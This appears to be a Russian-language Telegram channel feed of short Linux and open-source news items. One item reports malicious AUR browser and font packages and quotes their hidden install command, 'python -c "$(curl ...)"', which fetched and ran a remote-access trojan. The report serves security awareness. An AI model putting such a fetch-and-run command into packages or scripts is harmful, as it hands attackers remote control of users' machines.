Linux
2.22K subscribers
2.44K photos
19 videos
9.04K links
Новости Линукс Linux
Download Telegram
На соревновании Pwn2Own готовы выплатить миллион долларов за уязвимость в WhatsApp


Проект Zero Day Initiative (ZDI), предоставляющий денежные вознаграждения за сообщения о неисправленных уязвимостях, анонсировал проведение соревнований Pwn2Own Ireland 2025, которые состоятся в середине октября в Ирландии. Участникам предложено продемонстрирвоать эксплоиты для ранее неизвестных уязвимостей (0-day) в смартфонах, мессендрежах, беспроводных точках доступа, устройствах для умного дома, принтерах, сетевых хранилищах, системах видеонаблюдения и устройствах виртуальной /дополненной реальности. Атака должна быть проведена на самые свежие программы и операционные системы со всеми доступными обновлениями и в конфигурации по умолчанию.



👉@sysadminoff

https://www.opennet.ru/opennews/art.shtml?num=63673
Четвёртый экспериментальный выпуск среды рабочего стола Orbitiny


Опубликован четвёртый выпуск среды рабочего стола Orbitiny Desktop, написанной с нуля с использованием фреймворка Qt. Проект пытается совместить некоторые инновационные идеи, которые раньше не встречались в пользовательских окружениях, с традиционными элементами, такими как панель, меню и размещение пиктограмм на рабочем столе. Код написан на языке C++ и распространяется под лицензией GPL.



👉@sysadminoff

https://www.opennet.ru/opennews/art.shtml?num=63674
Shotcut 25.07.26


Выпущен Shotcut 25.07.26 — новая стабильная версия бесплатного видеоредактора доступна для Linux, macOS и Windows.
Основные нововведения:


Добавлен загрузчик моделей Speech to Text (включая Whisper.cpp (GGML)).


Новая тема интерфейса — System Fusion.


Фильтр Outline для работы с альфа-каналом (полезно для текста и прозрачных элементов).


Регулировка громкости аудио перетаскиванием пиковой линии волны.


Настройка Adjust Clip Gain/Volume в параметрах таймлайна.


Улучшения:


Поддержка 4 каналов в аудиофильтрах (Balance, Copy Channel и др.).


Режим Scrub While Dragging для точного редактирования на таймлайне.


Удержание Shift для тримминга с эффектом ripple (даже при отключённом Ripple).


Исправления:


Баги с 10-битным видео, Balance/Pan для многоканального аудио.


Проблемы с конвертацией iPhone 16 Pro (Ambisonic audio).


Ошибки в Mask: Apply и Freeze Frame.





 shortcut, видеомонтаж



👉@sysadminoff

https://www.linux.org.ru/news/multimedia/18041028
В Clang намерены добавить режим усиленной безопасности


Аарон Баллман (Aaron Ballman), главный сопровождающий компилятор Clang и участник команд разработки стандартов WG21 (C++) и WG14 (C), начал обсуждение добавления в компилятор Clang режима усиления безопасности. Новый режим позволит разом активировать набор опций для усиления защиты по аналогии с добавленным в GCC 14 флагом "-fhardened", при котором включаются опции "-D_FORTIFY_SOURCE=3 -D_GLIBCXX_ASSERTIONS -ftrivial-auto-var-init=zero -fPIE -pie -Wl,-z,relro,-z,now -fstack-protector-strong -fstack-clash-protection -fcf-protection=full".



👉@sysadminoff

https://www.opennet.ru/opennews/art.shtml?num=63675
Стабильный релиз прокси-сервера Squid 7


Представлен стабильный релиз прокси-сервера Squid 7.1, готовый для использования в рабочих системах (выпуски 7.0.x имели статус бета-версий). После придания ветке 7.x статуса стабильной, в ней отныне будут производиться только исправления уязвимостей и проблем со стабильностью, также допускается внесение небольших оптимизаций. Разработка новых возможностей будет производиться в новой экспериментальной ветке 8.0. Пользователям прошлой стабильной ветки 6.x рекомендуется спланировать переход на ветку 7.x.



👉@sysadminoff

https://www.opennet.ru/opennews/art.shtml?num=63676
Immich 1.137 Photo and Video Backup Arrives with Breaking Changes
—> https://linuxiac.com/immich-1-137-photo-and-video-backup-arrives-with-breaking-changes/



👉@sysadminoff
В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных пакетов


В репозитории AUR (Arch User Repository), были обнаружены пакеты содержащие вредоносный код, интегрированные в пакеты с неофициальными сборками браузеров. В дополнение к выявленным две недели назад трём вредоносным пакетам с браузерами, в AUR был добавлен пакет google-chrome-stable, также содержащий изменение, устанавливающее вредоносный компонент, предоставляющий удалённый доступ к системе.
В файле PKGBUILD проблемного пакета была определена установка скрипта для запуска браузера google-chrome-stable.sh, в котором среди прочего присутствовала команда ‘python -c «$(curl
вредоносная ссылка)»’, загружавшая вредоносное ПО, распознанное сервисом VirusTotal как троян Spark, позволяющий удалённо управлять системой, запускать процессы, передавать файлы, инспектировать трафик и отправлять скриншоты.
Вредоносный пакет был загружен позавчера и был удалён администраторами AUR через несколько часов после появления. Почти сразу после удаления этого вредоносного пакета в AUR были загружены два вредоносных пакета - «chrome» и «chrome-bin», содержащие аналогичный сценарий установки вредоносного ПО на систему пользователя.
Следом было выявлено ещё три пакета с вредоносным кодом: ttf-mac-fonts-all, ttf-ms-fonts-all и gromit.



 arch, aur, безопасность, троян



👉@sysadminoff

https://www.linux.org.ru/news/security/18040993
Chrome 140 Plans to Default to Auto Wayland Detection


Chrome devs plan to auto-detect Wayland on Linux in v140. This will fix issues with blurry text and UI elements under fractional scaling, using native rendering.
You're reading Chrome 140 Plans to Default to Auto Wayland Detection, a blog post from OMG! Ubuntu. Do not reproduce elsewhere without permission.



👉@sysadminoff

https://www.omgubuntu.co.uk/2025/08/chrome-140-wayland-auto-detection-linux
Neuro PlayGround Lite – A multichannel wireless bio-signal capture board for HCI & BCI projects (Crowdfunding)
https://www.cnx-software.com/2025/07/31/neuro-playground-lite-a-multichannel-wireless-bio-signal-capture-board-for-hci-bci-projects/



👉@sysadminoff
Reset forgotten ESXi 7.x / 8.x root password – A recovery guide


If you forget the root password for ESXi, VMware recommends reinstalling ESXi. In smaller environments without automated rollouts and central profiles, you must then configure all settings manually. Alternatively, you can reset the password using an unofficial method.
Source



👉@sysadminoff

https://4sysops.com/archives/reset-forgotten-esxi-7x-8x-root-password-a-recovery-guide/
Пакет StarDict в Debian отправляет содержимое буфера обмена на внешние серверы


В предлагаемом в репозитории Debian Testing (будущий релиз Debian 13) пакете StarDict, реализующем интерфейс для поиска в словарях, выявлена серьёзная проблема с конфиденциальностью - в конфигурации по умолчанию приложение отправляет содержимое буфера обмена на внешние серверы. Достаточно в любом приложении выделить отрывок текста и он сразу отправляется без шифрования по протоколу HTTP на китайские серверы online-словарей dict.youdao.com и dict.cn. Проблема проявляется только при работе в окружений на базе протокола X11, при использовании Wayland по умолчанию применяется изоляция буфера обмена.



👉@sysadminoff

https://www.opennet.ru/opennews/art.shtml?num=63677
Flameshot Screenshot App Gets First Major Update in 3 Years


Flameshot 13.0 marks the screenshot tool's first major update in over 3 years, adding Qt6 support, disabling Imgur uploads by default, and improving its tools.
You're reading Flameshot Screenshot App Gets First Major Update in 3 Years, a blog post from OMG! Ubuntu. Do not reproduce elsewhere without permission.



👉@sysadminoff

https://www.omgubuntu.co.uk/2025/08/flameshot-13